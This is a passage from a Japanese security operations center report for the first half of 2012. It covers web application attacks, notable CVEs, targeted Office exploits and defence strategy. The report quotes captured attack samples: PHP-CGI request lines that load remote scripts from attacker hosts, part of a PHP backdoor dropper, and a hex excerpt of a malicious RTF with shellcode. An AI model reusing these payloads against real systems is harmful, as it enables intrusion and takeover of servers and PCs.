ファイルを手動で実行すると、マルウェアに感染してしまいます。 また、この事例とは別のマルウェアを配布している Web サイトでは、Android OS でアクセスした場 合、APK ファイルをダウンロードさせ、その他の OS でアクセスすると Jar ファイル(Java Platform, Micro Edition:Java ME 環境のスマートフォン上で動作するマルウェア)をダウンロードさせようとする 事例が確認されています。 図 13 スマートフォン向けのマルウェアをダウンロードさせようとする不正な Web サイト このように最近の事例から、攻撃者は Windows OS や Mac OS だけでなく Android OS などスマー トフォン向け OS も攻撃のターゲットとして識別しようとしていることが分かります。今後は、プラット フォーム別に異なる攻撃を行う手法や内容がより洗練されていき、マルチプラットフォーム対応の攻撃が 主流となることが予想されます。 16 2012 年上半期 Tokyo SOC 情報分析レポート Web サーバーへの攻撃 3 Web アプリケーションへの攻撃 Web アプリケーションはインターネット上に公開されているため、クライアント PC よりも多くの 攻撃を受けます。攻撃者は、Web アプリケーションと連動して動作しているデータベースから情報を 抜き出したり、サーバーを攻撃の踏み台とするために乗っ取ろうとします。Web アプリケーションへ の攻撃として最も多いのは SQL インジェクション攻撃です。その他に、最近は Web アプリケーショ ンのプラットフォームの脆弱性や、CMS(Content Management System)の脆弱性を悪用する攻撃 も多数確認しています。 本章では、今期東京 SOC で確認した Web アプリケーションへの攻撃の特徴について解説します。 3.1 Web アプリケーションへの攻 撃検知状況 これらの攻撃は手動で行われたと判断できるものは 少なく、脆弱性診断ツール9やボットなどにより自動的 に行われたと考えられる攻撃が多くを占めています。 次節では、SQL インジェクション攻撃とその他の 今期確認した Web アプリケーションへの攻撃の内 Web アプリケーションへの攻撃について、詳細を解説 容別割合を図 14 に示します。確認された攻撃の 80% します。 は SQL インジェクション攻撃です。その他に、リモー 9 ト・ファイル・インクルージョンや OS コマンド・イ ンジェクションなど、既知の Web アプリケーション の脆弱性を悪用する様々な攻撃を確認しています。 脆弱性診断ツールを利用した Web アプリケーションへの攻撃に ついて、詳しくは「2011 年下半期 Tokyo SOC 情報分析レポー ト」の"3.3 脆弱性診断ツールを利用した攻撃"をご参照ください。 http://www.ibm.com/services/jp/its/pdf/tokyo_soc_report2011_ h2.pdf 20% SQLインジェクション攻撃 80% その他Webアプリケーションへ の攻撃 図 14 Web アプリケーションへの攻撃 -SQL インジェクション攻撃とその他の攻撃 (東京 SOC 調べ:2012 年 1 月 1 日~6 月 30 日) 17 2012 年上半期 Tokyo SOC 情報分析レポート SQL インジェクション攻撃 3.2 SQL インジェクション攻撃 トに対して、全てのページの脆弱性の有無を調べるよ うに大量のブラインド SQL インジェクション攻撃11 を行うことがあります。前述の一時的な攻撃の増加は、 攻撃者は、 SQL インジェクション攻撃によって Web このような一部の攻撃者による局所的な動向であり、イ サイトと連携するデータベースを不正に操作します。 ンターネット全体で増加していることを示すものでは データベースを不正に操作することで、データベース ありません。 に保存されている情報を窃取したり、データの改ざん 図 16 は、SQL インジェクション攻撃の種類別の割 (データベースの情報を Web サイトに表示している 合を示しています。約 8 割の攻撃はブラインド SQL 場合は、Web サイトの改ざんにつながります)を試み インジェクションです。この攻撃は、定常的にインタ たりします。今期確認した SQL インジェクション攻撃 ーネット全体で大規模に調査活動が行われているため、 の多くは情報窃取を目的とした攻撃でした。また、こ 検知数が多くなっています。 れまでも確認していた SQL Server を対象とする 「Web サイト改ざん10」を目的とした攻撃も確認して 10 一部で"Lizamoon"と呼ばれている攻撃です。"Lizamoon"につ いて、詳しくは「2011 年下半期 Tokyo SOC 情報分析レポート」 の"3.2 SQL インジェクション攻撃による Web サイト改ざん"をご 参照ください。 http://www.ibm.com/services/jp/its/pdf/tokyo_soc_report2011_ h2.pdf 11 SQL 命令に対してデータベースから返信される情報を基に、 自動ツールを使うなどして SQL 命令の送信を繰り返すことで、デ ータベース内の情報を取得する手法 いますが、ターゲットとなっている環境は限定されて います。 図 15 は、今期の SQL インジェクション攻撃の検知 数の推移です。期間中、攻撃検知数の増加が数回みら れますが、これはある特定環境への一時的な攻撃の増 加によるものです。一部の攻撃者は、1 つのターゲッ 16000 14000 検知数 約52,000件の イベントを検知 12000 10000 8000 6000 4000 2012/06/29 2012/06/23 2012/06/17 2012/06/11 2012/06/05 2012/05/30 2012/05/24 2012/05/18 2012/05/12 2012/05/06 2012/04/30 2012/04/24 2012/04/18 2012/04/12 2012/04/06 2012/03/31 2012/03/25 2012/03/19 2012/03/13 2012/03/07 2012/03/01 2012/02/24 2012/02/18 2012/02/12 2012/02/06 2012/01/31 2012/01/25 2012/01/19 2012/01/13 2012/01/07 2012/01/01 2000 0 図 15 SQL インジェクション攻撃の検知件数推移(東京 SOC 調べ:2012 年 1 月 1 日~6 月 30 日) 11% 1% ブラインドSQLインジェクション 12% Union命令を利用したSQLインジェクション 76% CMSの脆弱性を悪用したSQLインジェク ション その他 (SQL serverなどを対象にした攻撃 など) 図 16 SQL インジェクション攻撃の種類別割合(東京 SOC 調べ:2012 年 1 月 1 日~6 月 30 日) 18 2012 年上半期 Tokyo SOC 情報分析レポート SQL インジェクション攻撃 その次に多く検知している攻撃は、 「Union」演算子 攻撃を受けることが多い CMS としては WordPress を用いた SQL インジェクション攻撃です。この攻撃 や PHPMyAdmin、Joomla、XOOPS などがあげられ の多くがデータベースから情報を盗み出そうとする攻 ます。特に WordPress には様々な Plugin が公開され 撃です。この攻撃によって脆弱性が存在することが確 ており、個々の Plugin に脆弱性が存在することが多々 認された場合、攻撃者はさらなる攻撃を試みます。こ あります。そのため、このような Plugin の脆弱性が攻 の攻撃は脆弱性診断ツール(Havij や SQLmap など) 撃者のターゲットとなることが多くなっています。特 から行われることが多いという特徴も観測されていま に画像サイズ変更ユーティリティである す。 「timthumb.php」という Plugin については、2011 12 年 8 月に確認された脆弱性13への攻撃を未だに多数確 さらに、CMS などの既知の Web アプリケーション の脆弱性を悪用して、データベースの情報を漏えいし 認しています。 ようとする攻撃も確認しています。WordPress や その他に日本ではあまり知られていない韓国製や中 Joomla、XOOPS、PHPMyAdmin などの MySQL と連 国製の CMS の脆弱性を悪用する攻撃も確認されてい 携を行うアプリケーションが多くターゲットになって ます。これらの CMS の脆弱性を悪用する攻撃はボッ います。 トに感染したサーバーから行われており、このような アプリケーションの脆弱性を総当たりで攻撃する仕組 3.3 Web アプリケーションへのそ の他の攻撃 みを持っています。また、この攻撃によって感染した サーバーが同様の攻撃を他のサーバーに対して行うよ うになるため、インターネット上では多数の CMS の 脆弱性を悪用する攻撃が行われる状態となっています。 その他の攻撃の多くは、既知の Web アプリケーシ 12 複数のデータ要求を結合して 1 つのリクエストとして実行する 演算子 13 Tokyo SOC Report: WordPress を利用した Web サイトへの改ざ ん攻撃の増加 https://www.ibm.com/blogs/tokyo-soc/entry/wordpress_injecti on_20111115 ョンの脆弱性を悪用した、リモート・ファイル・イン クルージョンや OS コマンド・インジェクション攻撃 です。特に CMS の脆弱性を悪用する攻撃を多数確認 しています。 2000 1800 1600 1400 1200 1000 800 600 400 200 0 2012/06/29 2012/06/23 2012/06/17 2012/06/11 2012/06/05 2012/05/30 2012/05/24 2012/05/18 2012/05/12 2012/05/06 2012/04/30 2012/04/24 2012/04/18 2012/04/12 2012/04/06 2012/03/31 2012/03/25 2012/03/19 2012/03/13 2012/03/07 2012/03/01 2012/02/24 2012/02/18 2012/02/12 2012/02/06 2012/01/31 2012/01/25 2012/01/19 2012/01/13 2012/01/07 2012/01/01 検知数 図 17 SQL インジェクション攻撃以外の Web アプリケーションへの攻撃検知件数推移 (東京 SOC 調べ:2012 年 1 月 1 日~6 月 30 日) 19 2012 年上半期 Tokyo SOC 情報分析レポート SQL インジェクション攻撃 Web アプリケーションの脆弱性だけでなくミドル 攻撃者は常に情報漏えいを狙っているため注意が必要 ウェアの脆弱性を悪用する攻撃も観測されています。 です。 今期は、PHP の脆弱性(CVE-2012-1823)を悪用す CMS やミドルウェアの脆弱性を悪用する攻撃の多 る攻撃や Java EE アプリケーションサーバである くはボットなどから自動的に行われています。この攻 JBoss の脆弱性(CVE-2010-0738)を悪用する攻撃 撃によってサーバーが攻撃者によって乗っ取られてし が確認されています。 まうと、 他のサーバーを攻撃するために悪用されたり、 JBoss の脆弱性への攻撃は去年から確認されている ドライブ・バイ・ダウンロード攻撃の攻撃元サーバー もので、サーバーにバックドアを仕掛けようとする内 として加害者にされてしまう恐れがあります。 14 容です 。また、PHP の脆弱性を悪用する攻撃は、5 Web アプリケーションは、インターネットに公開さ 月 6 日頃から検知し始めたもので、7月現在も継続し れている性質上、多くの攻撃を受けるため、関連する 15 ています 。図 18 は、PHP の脆弱性を悪用する攻撃 システムの脆弱性が公開された際は、早めに対策を行 の検知件数の推移です。 うことが重要です。常日頃から、システムの脆弱性情 報を収集する体制や、脆弱性が公開された際に対策の 3.4 まとめ 検討・修正を即時に行う仕組みづくり行っておくこと を推奨します。 Web アプリケーションへの攻撃として最も多いの 14 JBoss の脆弱性への攻撃に詳しくは、「2011 年下半期 Tokyo SOC 情報分析レポート」の"5.4 JBoss の脆弱性を悪用した攻撃 "をご参照ください。 http://www.ibm.com/services/jp/its/pdf/tokyo_soc_report2011_ h2.pdf 15 PHP の脆弱性(CVE-2012-1823)を悪用する攻撃について、 詳しくは、「4.2 PHP の脆弱性を悪用した攻撃」をご参照ください。 は情報漏えいを目的とした SQL インジェクション攻 撃です。今期は、SQL インジェクション攻撃による情 報漏えいが注目を集めることはありませんでしたが、 140 検知数 120 100 80 60 40 20 2012/06/30 2012/06/27 2012/06/24 2012/06/21 2012/06/18 2012/06/15 2012/06/12 2012/06/09 2012/06/06 2012/06/03 2012/05/31 2012/05/28 2012/05/25 2012/05/22 2012/05/19 2012/05/16 2012/05/13 2012/05/10 2012/05/07 2012/05/04 2012/05/01 0 図 18 PHP の脆弱性を悪用する攻撃検知件数推移(東京 SOC 調べ:2012 年 5 月 1 日~6 月 30 日) 20 2012 年上半期 Tokyo SOC 情報分析レポート 4 今期確認された脆弱性のおさらい 本章では、今期東京 SOC にて注目した脆弱性について説明します。特に PHP の脆弱性、Telnetd の 脆弱性および Microsoft Office の脆弱性については実際の攻撃事例を踏まえて解説します。 4.1 今期注目を集めた脆弱性 ビスの脆弱性に関しては、東京 SOC でも実際の攻撃 を観測しており、7 月 11 日にパッチが公開されるま 今期確認された脆弱性の中でも特に注目すべき脆弱 性として、修正パッチ公開前に攻撃が発生(ゼロデイ 攻撃)したものや、PoC が公開されたもの、東京 SOC にて攻撃を確認したものを表 4 にまとめました。 今期は複数のゼロデイ脆弱性が確認されました。4 月 27 日には、Adobe Flash Player の未知の脆弱性 (CVE-2012-0779)を悪用する攻撃が確認されてい ます。さらに、6 月 20 日には、Microsoft XML コア サ ービスの脆弱性(CVE-2012-1889)を悪用する攻撃 が確認されています。この Microsoft XML コア サー での約 3 週間の間、 ゼロデイ攻撃が行われていました。 クライアント PC に関連する脆弱性として、2 月 2 日には Windows Media の脆弱性(CVE-2012-0008) を悪用する攻撃が確認されています。また、3 月 17 日および 6 月 27 日には JRE の脆弱性を悪用する新た な攻撃が確認されています。JRE に関しては、ゼロデ イ脆弱性が悪用されることは少なく、パッチ公開後に 既知の脆弱性が悪用されることが多いという傾向があ りますが、今期も同様にすべてパッチ公開後に攻撃が 行われました。 表 4 2012 年上半期の注目すべき脆弱性 日付 概要 東京SOCでの 観測の有無 CVE 2012年01月10日 Telnetd の脆弱性を悪用する攻撃を確認 ○ CVE-2011-4862 2012年02月02日 1月11日に公開された Windows Media の脆弱性を悪用する攻撃の増加を確認 ○ CVE-2012-0003 (MS12-004) 2012年02月09日 ゴーストドメイン名に関するDNSの脆弱性が公開される × CVE-2012-1033 2012年03月14日 マイクロソフトよりリモートから攻撃可能なリモートデスクトップの脆弱性が公開さ れる × CVE-2012-0002 (MS12-020) 2012年03月17日 2月15日に公開されたJDK/JRE 6 update 31にて修正された Java の脆弱を悪 用する攻撃の増加を確認 ○ CVE-2012-0507 2012年03月28日 2月15日に公開された Adobe Reader の脆弱を悪用する攻撃の増加を確認 ○ CVE-2012-0753 2012年04月17日 4月11日に公開された Windows の脆弱性を悪用する標的型攻撃を確認 ○ CVE-2012-0158 (MS12-027) 2012年04月27日 Adobe Flash Player のパッチ未公開の脆弱性を悪用する攻撃が発見される ※1 ○ CVE-2012-0779 2012年05月06日 PHP の脆弱性を悪用する攻撃を確認 ○ CVE-2012-1823 2012年06月11日 MySQLサーバーにリモートから認証を回避してログインできる脆弱性を利用する PoCが公開 × CVE-2012-2122 2012年06月17日 6月13日に公開された Internet Explorer の脆弱性を悪用する攻撃を確認 ○ CVE-2012-1875 (MS12-037) 2012年06月20日 Windowsのパッチ未公開の脆弱性を悪用する攻撃を確認 ○ CVE-2012-1889 2012年06月27日 6月12日に公開されたJDK/JRE 6 update 33にて修正された Java の脆弱を悪 用する攻撃の増加を確認 ○ CVE-2012-1723 ※1 http://www.symantec.com/connect/blogs/targeted-attacks-using-confusion-cve-2012-0779 21 2012 年上半期 Tokyo SOC 情報分析レポート 今期確認された脆弱性のおさらい サーバーに関連する脆弱性としては、 1 月 10 日に、 2011 年 12 月 に 公 開 さ れ た Telnetd の 脆 弱 性 (CVE-2011-4862)を悪用する攻撃が多数確認され ました。また、3 月 14 日に Windows のリモートデス 16 悪用するとリモートから不正なスクリプトが実行可能 になります。 この脆弱性を悪用する攻撃は、以下の 3 パターンが 確認されています。 クトップの脆弱性(MS12-020) が公開されていま 1.PHP のソースコードを閲覧しようとする行為 す。この脆弱性はワームなどの感染行為に悪用される 2.脆弱性の有無を調査する行為 可能性があることから注目を集めましたが、実際の攻 3.Web サーバーにバックドアを設置しようとする 撃は東京 SOC では確認していません。 行為 さらに、5 月 6 日頃から PHP の脆弱性を悪用する攻 撃が大規模に発生し、 現在でも継続しています。 また、 本脆弱性を悪用すると、CGI として動作する PHP 6 月 11 日には MySQL に、間違ったパスワードを連続 に対してオプションを指定して実行することが可能に で入力することでログインできてしまう特殊な脆弱性 なります。例えば、PHP にはハイライトされたソース (CVE-2012-2122)が確認されています。ポート コードを表示するオプション“-s”があります。そのた 3306 番への不正ログインの試みは古くからインター め、以下のように HTTP リクエストで CGI のページに ネット全体で確認されていますが、今後は攻撃者が本 対してオプション“-s”を渡すと、Web サイトのソース 脆弱性を悪用することが予想されるため、注意が必要 コードを漏えいさせることが可能です。 です。 以降では 、PHP の脆弱性(CVE-2012-1823)、 GET /index.php?-s HTTP/1.0 Telnetd の 脆 弱 性 ( CVE-2011-4862 )、 お よ び Microsoft Office の脆弱性(CVE-2012-0158)を悪 このような Web サイトのソースコードを漏えいさ 用した攻撃について、東京 SOC で検知した実際の攻 せようとする攻撃は、東京 SOC にて多数確認されて 撃事例を踏まえながら解説します。 います。 また、オプション“-d”を利用すると、php.ini の設定 4.2 PHP の脆弱性を悪用した攻 撃 2012 年 5 月 6 日 頃 か ら PHP の 脆 弱 性 (CVE-2012-1823)を悪用する攻撃を多数検知する ようになりました。この脆弱性は、PHP を CGI として を上書きして実行することができます。攻撃者はこの オプションを利用してリモートから不正なスクリプト の実行を試みています。図 19 は東京 SOC にて確認し た実際の攻撃例です。 16 リモートデスクトップの脆弱性について、詳しくは「Column3 リ モートデスクトップの脆弱性(MS12-020)」をご参照ください。 利用している場合に影響が発生します。この脆弱性を GET /index.php?-dallow_url_include=on+-dauto_prepend_file=http://www.5999mu.com/a.txt GET /index.php?-dallow_url_include=on+-dauto_prepend_file=http://www.qz0451.com/1.txt GET /index.php?-dsafe_mode=Off+-ddisable_functions=NULL+-dallow_url_fopen=On+-dallow_url_include=On+ -dauto_prepend_file=http://81.17.24.82/info3.txt 図 19 リモートから不正なスクリプトを実行しようとする攻撃 22 2012 年上半期 Tokyo SOC 情報分析レポート 今期確認された脆弱性のおさらい オプション“-d”の後に設定項目を指定しています。 “ allow_url_fopen ” お よ び 、“ allow_url_include ” を ON にすることで外部のスクリプトファイルの読み込 4.3 Telnetd の脆弱性を利用した 攻撃 みを許可し、“auto_prepend_file”にてリクエストさ れた PHP スクリプトの実行前に外部 Web サイトのス クリプトを実行させます(http://~ が実行させよう としている外部スクリプト) 。 読み込まれる外部スクリプトとしては、図 20 のよ うなレスポンスから脆弱性の有無を確認しようとする PHP コードを多数確認しています。攻撃者は、この調 査行為によって脆弱性の有無を確認した後、図 21 の ような PHP ベースのバックドアプログラムを読み込 ませようとします。 2012 年 1 月 10 日頃から、Telnetd の脆弱性 (CVE-2011-4862)を悪用する不正な通信が増加し ていることを確認しました。この脆弱性は、2011 年 12 月末に発表され、12 月 26 日には PoC が公開され ました。 この脆弱性は、Telnetd の暗号化キーの Key ID の 長さチェックの不備に起因します。この脆弱性を悪用 すると、リモートから任意のコードを実行することが 可能です。攻撃者は本脆弱性を悪用して、サーバー上 の"/bin/sh"を呼び出し、リモートコントロールしよう としていました。 <?php echo("830ad4ea3b311795d5a615b9e5fdbb9a"); ?> 図 20 攻撃によって読み込まれる不正な外部スクリプト(調査行為) <?php echo("<h2>I'm a man!</h2>"); ?> <?php //путь и сам файл $file="c99.php"; //если файла нету... тогда $fp = fopen($file, "w"); // ("r" - считывать "w" - создавать "a" - добовлять к тексту), мы создаем файл fwrite($fp, "<?php $QBDB51E25BF9A7F3D2475072803D1C36D=\ "DQovKg0KRW5jb2RlciA6IEFST0hBIFBIUGVuY29kZXIgdmVyLiAxLjA0DQpXRUIgOiBodHRwOi8vcGhwZW5jb2Rlci5hcm9oYS5zay8NCio vDQo/Pjw/DQovL2FkZCBwaHAgdGFncyBiZWZvcmUgdXNhZ2UNCi8qDQoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioq ~ 以下省略 ~ Web 表示 図 21 攻撃によって読み込まれる不正な外部スクリプト(バックドア) 23 2012 年上半期 Tokyo SOC 情報分析レポート 今期確認された脆弱性のおさらい 図 22 は、実際に検知した攻撃の内容です。 システムをインターネット上から探していたと考えら また、この攻撃と同時期にポート 23 番へのスキャ れます。このポート 23 番へのスキャン通信の国別割 ン通信が増加していました (図 23 1 月 18 日頃から) 。 合は、図 24 の通りです。多くのスキャンが韓国の IP 攻撃者は大規模に、今回の脆弱性のターゲットとなる アドレスから行われていたことが分かっています。 図 22 Telnetd の脆弱性を悪用する攻撃パケット 140000 検知数 120000 100000 80000 60000 40000 20000 2012/03/25 2012/03/18 2012/03/11 2012/03/04 2012/02/26 2012/02/19 2012/02/12 2012/02/05 2012/01/29 2012/01/22 2012/01/15 2012/01/08 2012/01/01 0 図 23 ポート 23 番へのスキャン通信検知数の推移(東京 SOC 調べ:2012 年 1 月 1 日~3 月 31 日) 22% Korea China 46% 2% 2% 3% 3% 3% 4% Turkey Taiwan Egypt USA New Zealand Russian Federation Italy 7% 8% Other 図 24 ポート 23 番へのスキャン通信の送信元国別割合(東京 SOC 調べ:2012 年 1 月 1 日~3 月 31 日) 24 2012 年上半期 Tokyo SOC 情報分析レポート 4.4 Microsoft Office の脆弱性を 悪用した攻撃 2012 年 4 月 17 日頃から、Microsoft Office の脆 弱性(MS12-027:CVE-2012-0158)を悪用する標 的型メール攻撃が多数確認されました17 。この脆弱 性 は 、 Windows コ モ ン コ ン ト ロ ー ル (MSCOMCTL.OCX)に存在しており、Microsoft Office だけでなく Microsoft SQL Server など、複 数のアプリケーションが対象となっています。 この脆弱性への攻撃は、主に標的型メール攻撃で 確認されています。標的型メール攻撃では、脆弱性 を悪用する不正な Doc ファイルが用いられます。不 正な Doc ファイルは図 25 のような RTF フォーマッ トになっており、不正な Doc ファイル内には以下の 内容が含まれています。 ・ 脆弱性を悪用するコード ・ シェルコード ・ ダミーファイル(RTF フォーマット) 不正な Doc ファイルを Microsoft Office Word で 開 い た 場 合 、 RTF の オ ブ ジ ェ ク ト と し て MSCOMCTL.OCX (MSComctlLib.ListViewCtrl.2) が呼び出されます。 パ ッ チ の 適 用 さ れ て い な い Microsoft Office Word でこのファイルを開いた場合、シェルコード が動作し、ファイル内部に含まれている Windows 実行ファイル(マルウェア)をクライアント PC 内 に保存して実行します。さらに、ダミーのファイル (RTF フォーマット)をクライアント PC 内に保存 し、Microsoft Office Word で表示します。 そのため、表向きはダミーファイルが表示されま すが、バックグラウンドではマルウェアの感染が発 生します。 17 Microsoft Office の脆弱性(MS12-027:CVE-2012-0158)を 悪用する標的型メール攻撃について、詳しくは「1.2 標的型メ ール攻撃の傾向」をご参照ください。 ・ マルウェア(Windows 実行ファイル) RTFフォーマット {\rtf1 {\fonttbl{\f0\fnil\fcharset0 Verdana;}} \viewkind4\uc1\pard\sb100\sa100\lang9\f0\fs22\par \pard\sa200\sl276\slmult1\lang9\fs22\par {\object\objocx MSComctlLib.ListViewCtrl.2 {\*\objdata 01050000020000001B0000004D53436F6D63746C4C69622E4C697374566965774374726C2E32000000000000000000000E0000 D0CF11E0A1B11AE1000000000000000000000000000000003E000300FEFF090006000000000000000000000001000000010000 OLEオブジェクト 0000000000001000000200000001000000FEFFFFFF0000000000000000FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF ~ 省略 ~ 8005000080000000000000000000000000000000001FDEECBD010005009017190000000800000049746D73640000000200000001 0000000C000000436F626A640000008282000082820000000000000000000000000000d06ffb7f909090909090909050e800000000 58050a010000c7002403dd665881ec00040000e8000000006a0ce9a90000000098fe8a0eac08da7683b9b578ad9b7ddffb97fd0fea49 8ae8db8a23e9d4d90e677073ef3654caaf9133ca8a5b8e4e0eec41445641504933320000000081eb4aa8711a8a02759c2ec1e673e23 シェルコード 55c57494e574f52442e45584500536f6674776172655c4d6963726f736f66745c4f66666963655c31312e305c776f72645c526573696 ~ 省略 ~ 0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 } } } ・ ク @ ・ コ エ ヘ!クLヘ!This program cannot be run in DOS mode. マルウェア (Windows実行ファイル) $ Ssミ ~ 省略 ~ {\rtf \ansi \ansicpg936 \deff0 \stshfdbch1 \stshfloch0 \stshfhich0 \deflang2052 \deflangfe2052 {\fonttbl ダミーファイル (RTFフォーマット) ~ 省略 ~ } 図 25 Microsoft Office の脆弱性を悪用する不正なファイルの内部 25 2012 年上半期 Tokyo SOC 情報分析レポート 4.5 まとめ MS12-027 の脆弱性を悪用する攻撃が非常に多くな りました。本脆弱性を修正するパッチをまだ適用し 前節で解説した Microsoft Office の脆弱性を悪用 する標的型メール攻撃は多数確認されています。こ の脆弱性が確認されるまでは、標的型メール攻撃に 悪用される Microsoft Office の脆弱性は一年以上前 の脆弱性 MS10-087(CVE-2010-3333)が主流で した。それが、本脆弱性が発見されて以降、 ていない場合は、すぐに適用することを推奨します。 本章で取り上げた脆弱性はすべて修正パッチや脆 弱性を修正したバージョン、回避策が公開されてい ます。脆弱性に未対応のシステムを使用している場 合は、直ちにアップデートを行うことを強く推奨し ます。 MS10-087 の脆弱性を悪用する攻撃が大幅に減少し、 26 2012 年上半期 Tokyo SOC 情報分析レポート [Column3] リモートデスクトップの脆弱性(MS12-020) 2012 年 3 月 14 日、マイクロソフトよりリモートデスクトップの脆弱性を修正するパッチが公開され ました。パッチには 2 件の脆弱性の修正が含まれており、このうちの 1 件(CVE-2012-0002)は認証 情報を持たない攻撃者がリモートから任意のコードを実行できる可能性を示すものでした。外部からの接 続を許可する多くの環境が影響を受ける点や、マイクロソフトがパッチ公開後 30 日以内に本脆弱性を悪 用して任意のコードを実行する攻撃コードが公開される可能性を指摘した18ことから、本件は注目され、3 月 16 日には本脆弱性を悪用してブルースクリーン(BSOD)を引き起こす攻撃コードが公開されました。 図 26 は、今期東京 SOC で確認された TCP3389 番ポートに対するスキャン通信検知数の推移です。 脆弱性公開後、スキャンを行う IP アドレス数の増加が確認されました。ただし、確認されたスキャン通 信が本脆弱性と関連するものであるかは不明であり、検知件数の増加も一時的なものでした。 その後、2012 年 6 月末までに本脆弱性に対する大規模な攻撃は検知しておらず、また、本脆弱性を悪 用して任意のコードを実行する攻撃コードも確認していません。 140000 8000 検知数 送信元IPアドレス数 120000 イ 100000 ベ 80000 ン ト 60000 数 40000 20000 0 7000 I P 5000 ア 4000 ド 3000 レ ス 2000 数 1000 6000 2012/06/24 2012/06/17 2012/06/10 2012/06/03 2012/05/27 2012/05/20 2012/05/13 2012/05/06 2012/04/29 2012/04/22 2012/04/15 2012/04/08 2012/04/01 2012/03/25 2012/03/18 2012/03/11 2012/03/04 2012/02/26 2012/02/19 2012/02/12 2012/02/05 2012/01/29 2012/01/22 2012/01/15 2012/01/08 2012/01/01 0 図 26 TCP3389 番ポートに対するスキャン通信検知数の推移(東京 SOC 調べ:2012 年 1 月 1 日~6 月 30 日) リモートデスクトップ機能はデフォルト設定では無効化されているものの、システム管理等の目的で有 効化されている環境は多数存在しています。脆弱性公開直後に公表された調査では、世界中に 500 万台以 上のリモートデスクトップ機能が有効化さてホストが存在する可能性があると報告されています19。日本 に割り当てられた IP アドレスに限定しても、5,700 台以上が外部からのリモートデスクトップ接続を許 可する状態にあります20。これらの多くはコンシューマー・ネットワークに接続された一般のクライアン ト PC ですが、企業や組織のサーバー用途で稼動していると考えられるホストも含まれています。 本脆弱性への対策として、セキュリティパッチの適用やネットワークレベル認証(NLA)の利用が推奨 されています。NLA を利用するとリモートデスクトップ接続が行われる前に認証が要求されるようになる ため、認証情報を持たない攻撃者からの攻撃を回避することが可能になります。 リモートデスクトップに対してはパスワード推測攻撃による不正ログインを試みる攻撃も依然として行 われており、典型的なパスワードによる不正ログインおよび感染を試みるワーム(「Morto」ワーム)も存 在します。本脆弱性だけにとらわれず、外部へ公開する他のサービスと同様に強固なパスワードの利用や、 Firewall などによるアクセス元の制限といった対策がなされているか今一度確認することを推奨します。 18 CVE-2012-0002: A closer look at MS12-020's critical issue (Security Research & Defense Blog) http://blogs.technet.com/b/srd/archive/2012/03/13/cve-2012-0002-a-closer-look-at-ms12-020-s-critical-issue.aspx 19 RDP and the Critical Server Attack Surface http://dankaminsky.com/2012/03/18/rdp/ 20 SHODAN - Computer Search Engine http://www.shodanhq.com/ 27 2012 年上半期 Tokyo SOC 情報分析レポート 5 標的型攻撃対策と従来型攻撃対策のバランス 2011 年下半期以降、政府組織や重要産業への標的型攻撃や、Anonymous の示威活動などにより、 一般のメディアにサイバー攻撃に関連するニュースが取り上げられることが多くなりました。 しかし、派手に報道されるサイバー攻撃が話題になる一方で、単純なウイルス感染など旧来のサイ バー攻撃の脅威が去ったわけではありません。東京 SOC が識別、対処するセキュリティー・インシデ ントの大部分は、初歩的なウイルス感染や陳腐な Web サイト攻撃など、従来型の攻撃によって引き起 こされたものです。 高度な標的型攻撃への対策は多岐にわたるため追求すると際限がありませんが、どこまでコストを 許容するのかという現実的な問題への模範解答はありません。本章では諸種のサイバー攻撃を分類、 整理した上で、実際の攻撃傾向に基づいた対策方針を提案します。 5.1 攻撃者の動機と手法 トで活発に売買されている様子からは、攻撃が純粋に 金銭を目的として行われていることが伺われます。 東京 SOC では、諸種のサイバー攻撃を推測される 動機別に、「金銭目的」「示威行動」「諜報活動」の 3 種類に分類しています。本節ではその分類について順 に紹介します。 金銭目的 実際に SOC が識別、対処するセキュリティー・イ ンシデント21の大部分はこのカテゴリに属します。不 特定多数の対象から金銭または容易に金銭に換えられ る情報や IT 資源を窃取することを目的としています。 具体的な手法として、ドライブ・バイ・ダウンロード 攻撃やスパムメールなどを介したクライアント PC へ のマルウェア感染、SQL インジェクションやリモー ト・ファイル・インクルージョンなどによる公開サー バーのマルウェア感染、コンテンツ改ざん、情報窃取 などが行われます。恐喝目的の DDoS 攻撃もこのカテ ゴリに属します。 この種の攻撃に用いられるウイルス作成ツールや Exploit Pack22などがアンダーグラウンド・マーケッ 攻撃者は、攻撃ツールを購入し、さらに作業者を雇 用してそれらを使わせます。必要に応じて銀行口座な ど金銭の授受手段も用意します。 金銭目的の攻撃を回避するためには、攻撃者のコス ト・パフォーマンスを相対的に悪化させることが有効 です。例えば、主要アプリケーション(Windows、 Office、 Adobe、JRE)を最新バージョンで維持する、 あるいは主要アプリケーションを利用せず代替アプリ ケーションを利用する、EMET などのエンドポイント の攻撃対策機能を有効にする、といった対策を実施す ることができれば、Exploit Pack を用いた攻撃の成功 率を著しく下げることが可能です。これを直ちに攻略 しようとすると攻撃者も相応の投資を行う必要が生じ ます。 「対象が誰でもいい」金銭目的の攻撃で過大な投 資が行われる可能性はあまり高くありません。 21 IBM の提供するマネージド・セキュリティー・サービスでは、一 定時間内に発生したイベント群を関連付けて総合的に分析し、対 象となったシステムに影響を及ぼす可能性があると判断したもの をセキュリティー・インシデントと称しています。 22 Exploit Pack について、詳しくは「2.2 今期のドライブ・バイ・ダウ ンロード攻撃の傾向」をご参照ください。 28 2012 年上半期 Tokyo SOC 情報分析レポート 標的型攻撃対策と従来型攻撃対策のバランス 示威行動 応答時間など)を定義した上で、攻撃と識別する条件 昨年来話題になっている Anonymous や、毎年 9 月 を用意し、対処する方針とそのためのリソースを確保 に話題になる、満州事変への報復を動機とした中国の インターネット・コミュニティーによる日本の組織へ の一斉攻撃などがこのカテゴリに属します。 多少の例外はありますが、基本的に以下のような攻 撃形態をとります。 しておく必要があります。 どの程度のリソースを確保しておくかは守るべきサ ービスの価値により様々ですが、何を持って攻撃とと らえるのかを定義しておくことと、それを迅速に検知 するためのシステムを用意しておくことは必須です。 (1) DDoS/DoS 攻撃によるサービス妨害 (2) 公開サービスの改ざんによる名誉毀損 諜報活動 (3) サーバーに保管された個人情報、機密情報など 標的型攻撃、Advanced Persistent Threat(APT) の奪取による名誉毀損 など、限定的な対象に対して行われる技術的に高度な 攻撃や手間のかかるソーシャル・ハッキングなどの手 攻撃の多くはオンライン・コミュニティーで募った 法を盛り込んだ攻撃がこのカテゴリに属します。攻撃 参加者を主体として大規模に行われます。示威目的の 主体や目的が明らかになることはほとんどありません ために技術レベルの高くない人間も含め、とにかく大 が、観測された状況証拠や報道された公開情報などに 